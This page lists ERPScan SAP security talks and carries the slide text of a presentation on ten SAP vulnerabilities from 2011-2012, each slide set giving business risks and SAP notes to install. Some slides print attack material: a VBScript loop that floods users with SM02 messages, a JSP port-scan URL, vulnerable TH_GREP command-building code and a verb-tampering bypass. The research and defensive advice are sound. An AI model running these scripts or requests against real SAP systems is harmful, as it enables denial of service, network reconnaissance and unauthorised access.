The presentation lists the top 10 SAP vulnerabilities of 2011-2012 and the ways to defend against them.
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
The latest changes to SAP cybersecurity landscape - ERPScan
SAP is the most popular business application with more than 250000 customers worldwide.
The presentation describes the latest trends in SAP security. Multiple vulnerabilities have been found in SAP NetWeaver ABAP, SAP NetWeaver J2EE, SAP BusinessObjects, SAP HANA, and SAP Mobile Platform.
If I want a perfect cyberweapon, I'll target ERP - ERPScan
ERP systems are widely used in Oil and Gas, Manufacturing, Logistics, Financials, Nuclear, Retail, Telecommunication and other industries. All mission-critical data are stored in ERP systems, so attacks against them may result in Espionage, Sabotage and Fraud.
The presentation gives examples of real and potential attacks and describes important details of ERP Security.
Alexander Polyakov, CTO of ERPScan, presented this talk at RSA Conference Europe 2013.
Practical SAP pentesting (B-Sides San Paulo) - ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at B-Sides Conference 2014 (San Paulo) is a practical SAP pentesting guide.
5 real ways to destroy business by breaking SAP applications - ERPScan
SAP is the most popular business application with more than 263000 customers worldwide.
SAP risks can be divided into three groups: Espionage, Sabotage and Fraud.
The presentation reviews the 5 most dangerous risks any business may face. For every risk, it gives the risk type, attack scenario, affected sector, and vulnerable module.
Practical SAP pentesting workshop (NullCon Goa) - ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at the NullCon Goa conference is a practical SAP pentesting guide.
The increasing number of talks about SAP security and of SAP Security Notes indicates that it is becoming a hot topic.
The presentation describes the top types of SAP vulnerabilities, the number of SAP systems reachable from the Internet and the risks a business may face.
We did not manage to find any solution that could resolve all of these security problems described there, so we created one ourselves.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security, as these applications store business data, and any vulnerability in them can cause a significant monetary and reputational loss or even a stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine - ERPScan
SAP is the most popular business application, with more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. Yet ERP systems run all business processes and store all critical information: finances, HR, client data. Not caring about the security of this data is not very sensible.
The presentation provides examples of simple and advanced attacks along with ways to avoid them.
SAP Mobile infrastructure consists of multiple systems: SAP Mobile Platform (formerly Sybase Unwired Platform), the SAP Afaria MDM solution, the Sybase SQL Anywhere database, and hundreds of SAP mobile applications. SAP even has its own store for mobile apps, which can be developed by third parties. This talk shows how SAP Mobile can be attacked.
In this popular platform, we have discovered a lot of typical vulnerabilities - XSS, XXE, hardcoded static encryption keys, and vulnerabilities that are specific to this platform - logic vulnerabilities and privilege escalations. As a result, after compromising the SAP Mobile platform, we demonstrated how to get access to compromised mobile phones.
The presentation describes 5 steps you should take to secure your SAP. They are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
Oracle PeopleSoft applications are under attacks (Hack in Paris) - ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies, including about 50% of the Fortune 100. PeopleSoft applications are widespread over the world, with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes
Forgotten world - Corporate Business Application Systems - ERPScan
Enterprise Resource Planning (ERP) is the collection of computers, servers and databases that store & manage:
- Human Resources information
- Inventory
- Shipping
- Procurement
- Financial, Banking & Accounting
- Payroll.
Basically, it's data the company really cares about.
ERP seemed to be a forgotten world in the information security field. However, any vulnerability in or compromise of these systems can cause a significant monetary loss or even a stoppage of business. Although it is a relatively new area, awareness of security problems in ERP has grown during the last year.
This presentation covers such parts of ERP Security as ERP Security issues, Architecture Flaws, Vulnerabilities and others.
There is a myth that SAP is not accessible and cannot be attacked from the Internet. As the system becomes more popular and cloud services and mobile solutions appear, more and more SAP services become accessible from the Internet.
Why are vulnerabilities that allow reading any file from the SAP host OS important? Because SAP stores a lot of sensitive information in files: log files, trace files, configuration or properties files. Of course, most of them have protection such as encryption, but the presentation shows how easily this encryption can be bypassed.
The interest in SAP security is growing exponentially, and not only among whitehats. Unfortunately, SAP users still pay little attention to SAP security.
The findings were presented at RSA APAC Conference 2013.
This research focuses on statistics of SAP Vulnerabilities, threats from the Internet, known incidents and future trends.
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back... - ERPScan
Any information an attacker might want is stored in corporate ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage, and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system, and they can cause significant reputation and financial losses to the business.
This research provides information about SSRF attacks and their classification. It also shows examples of SSRF attacks, as well as new potential and real SSRF vectors.
Many SAP systems are connected to the Internet and expose sensitive services beyond Web applications. Furthermore, the internal network is usually not properly segmented.
Practical pentesting of ERPs and business applications - ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in the company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system and cause significant damage to the business.
The presentation describes the specifics of ERP pentesting and focuses on SAP NetWeaver JAVA and Oracle PeopleSoft pentesting.
Top 10 most interesting vulnerabilities and attacks in SAP - ERPScan
The increasing number of SAP Security Notes and talks on SAP security proves that it is becoming a really hot topic. However, attacks on SAP systems are still believed to be possible only for insiders. The reality is not so good: there are about 5000 systems, including dispatchers, message servers, SAPHostControl services and Web services, reachable on the Internet.
Top 10 vulnerabilities 2011-2012 are:
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
The presentation provides a detailed description of these attacks, their potential business risks and the ways to prevent them.
EAS-SEC: Framework for securing business applications - ERPScan
For quite a long time, ERP security was just a synonym for segregation of duties. Nowadays the situation has changed: there are 3 areas of business application security, namely SOD, custom code security and application platform security. SAP customers are now aware of problems with their SAP installations, but they still don’t know where to start solving them.
The aim of EAS-SEC (http://eas-sec.org/) is to raise awareness of enterprise application security problems and to create guidelines and tools for enterprise application security assessment.
Architecture vulnerabilities in SAP platforms - ERPScan
SAP security becomes a hot theme nowadays. Attacks on SAP can put a business at risk of Espionage, Sabotage and Fraud.
The presentation covers the following architecture and unusual issues:
Authentication Bypass
1. Verb tampering
2. Invoker servlet
Encryption
3. Storage – SAPGUI
4. Authentication – P4
5. Transfer – RFC, Diag
SSRF
6. Port Scan
7. Command execution
8. Security bypass
The presentation also gives advice for developers and describes future trends in the SAP security area.
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us - PROIDEA
Nowadays, everyone knows about the great importance of SAP systems and the critical data processed by them. Large companies install SAP Security Notes regularly so as not to repeat the mistake of Nvidia. One bug is no longer enough to get access to all corporate SAP systems. Pentesters frequently find themselves in a situation where the OS of an SAP server has been compromised successfully, but they have not got access to the ERP system. It is also rather common to have an unprivileged account that gives them access to an encrypted password, but not to the whole system. Sometimes they even try to break into other systems with the passwords that users reuse from systems already broken into, but they can’t, because the passwords need to be decrypted first. Where do we find the treasured password that grants access to the financial transactions and revenues of NASDAQ monsters?
Where and how does SAP store user passwords? Are all passwords stored as hashes, or can attackers find passwords in plaintext?
This talk reviews the many places where SAP stores critical credentials, such as usernames and passwords, and, which is more interesting, the way it stores them. Methods of retrieving them will be described, and decryption utilities will be presented.
SAP GUI shortcuts, RFC connections, SAP Security Storage, logs, traces, Database links, SAP HANA Storage, you name it – all varieties of SAP modules will be discussed in this talk.
A crushing blow at the heart of SAP’s J2EE Engine - ERPScan
Business process automation (ERP, PLM, CRM, SRM) is based on the ABAP stack.
The following integration, collaboration and management systems are based on the J2EE engine:
- SAP Portal
- SAP PI
- SAP XI
- SAP Mobile Infrastructure
- SAP Solution Manager.
Administrators, developers, pentesters, and researchers mostly focus on the ABAP stack. Attackers know this, so they will find easier ways to control your business.
The presentation describes the SAP J2EE platform architecture and provides examples of internal and external attacks and ways to prevent them.
Top Ten Proactive Web Security Controls v5 - Jim Manico
It is not easy to build a secure, low-risk or risk-managed web application. Firewalls, “policy” and other traditional information security measures serve as either an incomplete or useless measure in the pursuit of web application security.
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game.
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.
This document is neither scientific nor complete. In fact it is a bit misguided. There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements - Olivier DASINI
MySQL Enterprise Transparent Data Encryption (TDE) protects your critical data by enabling data-at-rest encryption in the database. It protects the privacy of your information, prevents data breaches and helps meet regulatory requirements including the Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA) and numerous others.
MySQL Enterprise Audit provides an easy to use, policy-based auditing solution that helps organizations implement stronger security controls and satisfy regulatory compliance.
As more sensitive data is collected, stored and used online, database auditing becomes an essential component of any security strategy. To guard against the misuse of information, popular compliance regulations including HIPAA, Sarbanes-Oxley, and the PCI Data Security Standard require organizations to track access to information.
MySQL Enterprise Firewall guards against cyber security threats by providing real-time protection against database specific attacks. Any application that has user-supplied input, such as login and personal information fields is at risk. Database attacks don't just come from applications. Data breaches can come from many sources including SQL virus attacks or from employee misuse. Successful attacks can quickly steal millions of customer records containing personal information, credit card, financial, healthcare or other valuable data.
MySQL Enterprise Masking and De-identification provides an easy to use, built-in database solution to help organizations protect sensitive data from unauthorized uses by hiding and replacing real values with substitutes.
MySQL Enterprise Edition provides ready to use external authentication modules to easily integrate existing security infrastructures, including Linux Pluggable Authentication Modules (PAM) and Windows Active Directory.
Business applications like ERP, CRM, SRM, and others are one of the major topics of information security, as these applications store business-critical data, and any vulnerability in them can cause a significant monetary and reputational loss or even a stoppage of business.
There are several myths about Business Applications Security such as:
Myth 1: Business Applications are available only internally.
Myth 2: ERP security is a vendors' problem.
Myth 3: Business Application internals are very specific and unknown to hackers.
Myth 4: ERP security is all about Segregation Of Duties.
Our findings explode these myths.
An unusual number of recent news articles spotlighting SSL security flaws, including HeartBleed, POODLE, and FREAK, has forced major security policy changes in communication software and compliance standards. To meet future security challenges and to keep the business running, this session highlights how the Rocket MV product family can help you fortify your data communications and meet the compliance requirements of today and tomorrow.
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm... - ERPScan
This research includes a detailed attack timeline, identifies what kind of vulnerability was exploited and provides recommendations on how to avoid data breaches in SAP systems.
Oracle PeopleSoft applications are under attack (HITB AMS) - ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies, including about 50% of the Fortune 100. PeopleSoft applications are widespread over the world, with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes the PeopleSoft architecture and provides several internal and external attack vectors. Let’s look at the most dangerous one. PeopleSoft systems are often accessible from the Internet, and some parts of the system have to be available before registration, for example job application forms or “Forgot your password?” forms. For this purpose, there is a special user with minimal rights in PeopleSoft systems, and when you enter, the system automatically authenticates you as this user. This opens the way for a privilege escalation attack by brute-forcing the authentication cookie called TokenID. TokenID is generated with the SHA1 hashing algorithm, and according to the latest information, an 8-character alphanumeric password can be cracked within one day on the latest GPUs, which cost about $500.
13 real ways to destroy business by breaking company’s SAP applications - ERPScan
All SAP risks can be divided into three groups: Espionage, Sabotage and Fraud.
The presentation reviews the 13 most dangerous risks any business may face. For every risk, it gives the risk type, attack scenario, affected sector, and vulnerable module.
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy... - ERPScan
SAP is the most popular business application, with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. Yet ERP systems run all business processes and store all critical information: finances, HR, client data. Not caring about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure (DI) is a complex product. It combines the characteristics and advantages of local development environments with a server-based development landscape, centrally providing the means to support the software, implement new features, manage the product lifecycle, etc. Its main aim is to control the deployment of components in the system landscape in a standardized manner.
The key component of the DI scheme is the Software Deployment Manager (SDM). It interacts directly with production systems, which is why it is so critical.
The presentation describes the special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
The interest in SAP security has been growing exponentially, and not only among whitehats. SAP invests money and resources in security, provides guidelines, and arranges conferences, but, unfortunately, SAP users still pay little attention to SAP security.
The presentation gives the most important takeaways for CISOs on providing SAP security for enterprises. It dispels the SAP security myths, includes statistics obtained by the ERPScan Research Group, and covers future trends in SAP security.
Online analytical processing (OLAP) is an approach to formulating and answering multidimensional queries over large datasets. OLAP and Business Intelligence were initially developed to help top- and middle-level executives analyze information about processes and data inside and outside the company. OLAP is all about BI and Big Data.
The main players in the OLAP industry are Microsoft with Microsoft Analysis Services, SAP with SAP NetWeaver BW, SAS OLAP Server, IBM Cognos TM1, the open source icCube solution, Essbase and the OLAP add-on from Oracle, and others.
MDX is a very popular language; at this moment, there is no alternative language for multidimensional data requests. All developers forget about MDX security. However, security issues in MDX can lead to many attacks: data theft, file reading, privilege escalation, remote code execution, SQL injection, cross-site scripting, etc.
The presentation covers details of OLAP technology, MDX attacks, getting RCE with MDX, and mdXML attacks.
Dmitry Chastukhin, Director of Security Consulting at ERPScan, spoke at the DeepSec Conference 2012 on SAP security.
SAP is the most popular business application, with more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed and all critical information is stored.
The presentation describes how SAP Portal works and the kinds of attacks it can be exposed to.
1. Invest in security to secure investments
SAP (In)Security: New and Best
Alexander Polyakov, CTO at ERPScan
2. About ERPScan
• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 Awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
4. Really
• The most popular business application
• More than 120000 customers
• 74% of Forbes 500
5. Agenda
• Intro
• SAP security history
• SAP on the Internet
• Most popular SAP issues (OLD)
• Top 10 latest interesting attacks (NEW)
• DEMOs
• Conclusion
6. 3 areas of SAP Security
2010 - Application platform security: prevents unauthorized access by both insiders and remote attackers. Solution: Vulnerability Assessment and Monitoring
2008 - ABAP Code security: prevents attacks or mistakes made by developers. Solution: Code audit
2002 - Business logic security (SOD): prevents attacks or mistakes made. Solution: GRC
7. Talks about SAP security
[Chart: number of talks about SAP security per year, 2006-2012]
Most popular: BlackHat, HITB, Troopers, RSA, Source, DeepSec, etc.
8. SAP Security notes
[Chart: number of SAP Security notes per year, 2001-2012]
By April 26, 2012, a total of 2026 notes
9. SAP vulnerabilities by type
[Chart: number of SAP vulnerabilities per type; stats from 1Q 2012, 1Q 2010 and 4Q 2009]
12 - SQL Injection
11 - BOF
10 - Denial of service
9 - Remote Code Execution
8 - Verb tampering
7 - Code injection vulnerability
6 - Hard-coded credentials
5 - Unauthorized usage of application
4 - Information Disclosure
3 - Missing Auth check
2 - XSS/Unauthorised modification of
1 - Directory Traversal
10. Top problems by OWASP-EAS (Implementation issues)
• EASAI-1 Lack of patch management
• EASAI-2 Default Passwords for application access
• EASAI-3 SOD conflicts
• EASAI-4 Unnecessary Enabled Application features
• EASAI-5 Open Remote management interfaces
• EASAI-6 Lack of password lockout/complexity checks
• EASAI-7 Insecure options
• EASAI-8 Unencrypted communications
• EASAI-9 Insecure trust relations
• EASAI-10 Guest access
11. Top problems by BIZEC
• BIZEC TEC-01: Vulnerable Software in Use
• BIZEC TEC-02: Standard Users with Default Passwords
• BIZEC TEC-03: Unsecured SAP Gateway
• BIZEC TEC-04: Unsecured SAP/Oracle authentication
• BIZEC TEC-05: Insecure RFC interfaces
• BIZEC TEC-06: Insufficient Security Audit Logging
• BIZEC TEC-07: Unsecured SAP Message Server
• BIZEC TEC-08: Dangerous SAP Web Applications
• BIZEC TEC-09: Unprotected Access to Administration Services
• BIZEC TEC-10: Insecure Network Environment
• BIZEC TEC-11: Unencrypted Communications
12. Business Risks
Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing suppliers and customers list
• Stealing HR data
Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations
Fraud
• False transactions
• Modification of master data
• etc.
13. SAP on the Internet
MYTH: attacks on SAP systems are available only to insiders
• We have collected data about SAP systems on the web
• Have various stats by countries, applications, versions
• Information from Google, Shodan, Nmap scan
15. SAP on the Internet
About 5000 systems, including Dispatcher, Message server, SapHostcontrol, Web services
16. Top 10 vulnerabilities 2011-2012
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
17. 10 – GUI-Scripting DOS: Description
• SAP users can run scripts which automate their user functions
• A script has the same rights in SAP as the user who launched it
• The security message which is shown to the user can be turned off in the registry
• Almost any user can use SAP Messages (SM02 transaction)
• It is possible to run a DOS attack on any user using a simple script
New
Author: Dmitry Chastukhin (ERPScan)
18. 10 – GUI-scripting: Details
If Not IsObject(application) Then
Set SapGuiAuto = GetObject("SAPGUI")
Set application = SapGuiAuto.GetScriptingEngine
End If
If Not IsObject(connection) Then
Set connection = application.Children(0)
End If
If Not IsObject(session) Then
Set session = connection.Children(0)
End If
If IsObject(WScript) Then
WScript.ConnectObject session, "on"
WScript.ConnectObject application, "on"
End If
do
a=a+1
session.findById("wnd[0]").maximize
session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02"
session.findById("wnd[0]/tbar[0]/btn[0]").press
session.findById("wnd[0]/tbar[1]/btn[34]").press
session.findById("wnd[1]/usr/txtEMLINE1").text = "hello"
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
session.findById("wnd[1]").sendVKey 4
session.findById("wnd[2]/usr/lbl[1,3]").setFocus
session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15
session.findById("wnd[2]").sendVKey 2
session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800"
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en"
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2
session.findById("wnd[1]/tbar[0]/btn[0]").press
Loop Until a>=1000
19. 10 – GUI-scripting: Other attacks
Other attacks, like changing banking accounts in LFBK, are also possible
Script can be uploaded using:
• SAPGUI ActiveX vulnerability
• Teensy USB flash
• Any other method of client exploitation
20. 10 – GUI-scripting: Business risks
Ease of exploitation – Medium
Sabotage – High
Espionage – No
Fraud – No
22. 9 – XML Blowup DOS: Description
• WEBRFC interface can be used to run RFC functions
• By default any user can have access
• Can execute at least RFC_PING
• SAP NetWeaver is vulnerable to malformed XML packets
• It is possible to run a DOS attack on the server using a simple script
• It is possible to run it over the Internet!
New
Author: Alexey Tyurin (ERPScan)
24. 9 – XML Blowup DOS: Business risks
Ease of exploitation – Medium
Espionage – No
Fraud – No
Sabotage – Critical
25. 9 – XML Blowup DOS: Prevention
• Disable WEBRFC
• Prevent unauthorized access to WEBRFC using S_ICF
• Install SAP notes 1543318 and 1469549
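As an added example (not from the presentation, ERPScan or SAP), a request gate of the kind a WEBRFC front end or reverse proxy could apply before a body reaches the real XML parser: it refuses DOCTYPE and ENTITY declarations (the entity-expansion "blowup" vector), oversized bodies, deep nesting and malformed XML. The envelope shape, the RFC_PING sample and the limits are constructed assumptions.

```python
# Added example (not from the presentation or SAP): a request gate a WEBRFC
# front end or reverse proxy could apply before the XML reaches the real parser.
import xml.parsers.expat


class UnsafeXML(Exception):
    """Raised by the expat handlers below when a forbidden construct is seen."""


def check_xml_request(data, max_bytes=64 * 1024, max_depth=32):
    """Return (accepted, reason). Refuses DOCTYPE and ENTITY declarations (the
    "blowup" vector), oversized bodies, deep nesting and malformed XML."""
    if len(data) > max_bytes:
        return False, "body exceeds %d bytes" % max_bytes
    parser = xml.parsers.expat.ParserCreate()
    depth = [0]  # element nesting depth, maintained by the handlers

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE declaration not allowed")

    def reject_entity(*_):
        raise UnsafeXML("ENTITY declaration not allowed")

    def start(name, attrs):
        depth[0] += 1
        if depth[0] > max_depth:
            raise UnsafeXML("nesting deeper than %d" % max_depth)

    def end(name):
        depth[0] -= 1

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    try:
        parser.Parse(data, True)
    except UnsafeXML as e:
        return False, str(e)
    except xml.parsers.expat.ExpatError as e:
        return False, "malformed XML: %s" % e
    return True, "ok"


# Constructed sample inputs; the envelope shape is illustrative, not SAP's schema.
RFC_PING = b"""<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body><RFC_PING/></SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

BLOWUP = b"""<?xml version="1.0"?>
<!DOCTYPE x [ <!ENTITY a "aaaaaaaaaa"> <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;"> ]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body><RFC_PING>&b;&b;&b;&b;</RFC_PING></SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
```

The gate rejects the second document at the DOCTYPE before any entity is expanded, so the expansion cost is never paid.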
26. 8 – BAPI script injection/hash stealing: Description
• SAP BAPI transaction fails to properly sanitize input
• Possible to inject JavaScript code or a link to a fake SMB server
• SAP GUI clients use Windows, so their credentials will be transferred to the attacker's host
Author: Dmitry Chastukhin (ERPScan)
27. 8 – BAPI script injection/hash stealing: Demo
New
28. 8 – BAPI script injection/hash stealing: Business risks
Ease of exploitation – Low
Sabotage – High
Espionage – High
Fraud – High
29. 7 – SAP GUI bad encryption: Description
• SAP FrontEnd can save encrypted passwords in shortcuts
• Shortcuts are stored in a .sap file
• This password uses a byte-XOR algorithm with a “secret” key
• The key has the same value for every installation of SAP GUI
• Any password can be decrypted in 1 second
New
Author: Alexey Sintsov (ERPScan)
31. 7 – SAP GUI bad encryption: Business risks
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploitation – Medium
32. 7 – SAP GUI bad encryption: Prevention
• Disable password storage in GUI
33. 6 – Remote port scan via JSP: Description
• It is possible to scan the internal network from the Internet
• Authentication is not required
• SAP NetWeaver J2EE engine is vulnerable
/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&password=&dispatcher=&targetClient=&view=
Author: Alexander Polyakov (ERPScan)
34. 6 – Remote port scan via JSP: Demo
[Screenshots: responses for a closed port, an HTTP port and a SAP port]
35. 6 – Remote port scan via JSP: Business risks
Ease of exploitation – High
Espionage – Medium
Fraud – No
Sabotage – Low
36. 6 – Remote port scan via JSP: Prevention
• Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883
• Disable unnecessary applications
37. 5 – MMC JSESSIONID stealing: Description
• Remote management of SAP Platform
• By default, many commands go without auth
• Exploits implemented in Metasploit (by ChrisJohnRiley)
• Most of the bugs are information disclosure
• It is possible to find information about JSESSIONID
• Only if trace is ON
Can be authenticated as an existing user remotely
1) Original bug by ChrisJohnRiley
2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan)
New
39. 5 – MMC JSESSIONID stealing: Business risks
Espionage – Critical
Sabotage – Medium
Fraud – High
Ease of exploitation – Medium
40. 5 – MMC JSESSIONID stealing: Prevention
• The JSESSIONID by default will not be logged in the log file
• Don’t use TRACE_LEVEL = 3 on production systems, or delete traces after use
• Other info: http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
41. 4 – Remote command execution in TH_GREP: Description
• RCE vulnerability in RFC module TH_GREP
• Found by Joris van de Vis
• SAP did not patch it properly (note 1433101)
• We have discovered that the patch can be bypassed on Windows
Original bug by Joris van de Vis (erp-sec)
Bypass by Alexey Tyurin (ERPScan)
42. 4 – RCE in TH_GREP: Details
elseif opsys = 'Windows NT'.
  concatenate '/c:"' string '"' filename into grep_params in character mode.
else. " if linux
  replace all occurrences of '''' in local_string with '''"''"'''.
  concatenate '''' local_string '''' filename into grep_params in character mode.
endif.
44. 4 - RCE in TH_GREP: More details
4 ways to execute the vulnerable program:
• Using transaction SE37
• Using transaction SM51 (thanks to Felix Granados)
• Using remote RFC call "TH_GREP"
• Using SOAP RFC call "TH_GREP" via web
46. 4 – RCE in TH_GREP: Business risks
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploitation – Medium
47. 4 – RCE in TH_GREP: Prevention
• Install SAP notes 1580017, 1433101
• Prevent access to critical transactions and RFC functions
• Check the ABAP code of your Z-transactions for similar vulnerabilities
48. 3 - ABAP Kernel BOF: Description
• Presented by Andreas Wiegenstein at BlackHat EU 2011
• Buffer overflow in SAP kernel function C_SAPGPARAM
• When the NAME field is more than 108 chars
• Can be exploited by calling an FM which uses C_SAPGPARAM
• Example of report – RSPO_R_SAPGPARAM
Author: (VirtualForge)
50. 3 – ABAP Kernel BOF: Business risks
Ease of exploitation – Medium
Espionage – Critical
Fraud – Critical
Sabotage – Critical
51. 3 – ABAP Kernel BOF: Prevention
• Install SAP notes:
- 1493516 – Correcting buffer overflow in ABAP system call
- 1487330 – Potential remote code execution in SAP Kernel
• Prevent access to critical transactions and RFC functions
• Check the ABAP code of your Z-transactions for critical calls
52. 2 – Invoker Servlet: Description
• Rapidly calls servlets by their class name
• Published by SAP in their security guides
• Possible to call any servlet from the application
• Even if it is not declared in WEB.XML
Can be used for auth bypass
54. 2 – Invoker servlet: Business risks
Ease of use – Very easy!
Espionage – High
Sabotage – High
Fraud – High
55. 2 - Invoker servlet: Prevention
• Update to the latest patch: 1467771, 1445998
• The “EnableInvokerServletGlobally” property of servlet_jsp must be “false”
If you can’t install patches for some reason, you can check all WEB.XML files using the ERPScan web.xml scanner or manually.
57. 1st Place – Verb Tampering
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
What if we use HEAD instead of GET?
Author: Alexander Polyakov (ERPScan)
58. 1st Place – Verb tampering: Details
Remotely without authentication!
• CTC – Secret interface for managing the J2EE engine
• Can be accessed remotely
• Can run user management actions:
– Add users
– Add to groups
– Run OS commands
– Start/Stop J2EE
60. 1 – Verb tampering: More details
If patched, can be bypassed by the Invoker servlet!
61. 1 – Verb tampering: Business risks
Espionage – Critical
Sabotage – Critical
Fraud – Critical
Ease of use – Very easy!
62. 1st Place – Verb tampering: Prevention
• Install SAP notes 1503579, 1616259
• Install other SAP notes about Verb Tampering (about 18)
• Scan applications using the ERPScan WEB.XML check tool or manually
• Secure WEB.XML by deleting all <http-method>
• Disable the applications that are not necessary
63. Conclusion
It is possible to be protected from almost all those kinds of issues, and we are working hard with SAP to make it secure
SAP Guides
It’s all in your hands
Regular Security assessments
ABAP Code review
Monitoring technical security
Segregation of Duties
64. Future work
Many of the researched things cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for cooperation. However, if you want to see new demos and 0-days, follow us at @erpscan and attend the future presentations:
• Just4Meeting in July (Portugal)
• BlackHat USA in July (Las Vegas)
65. Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.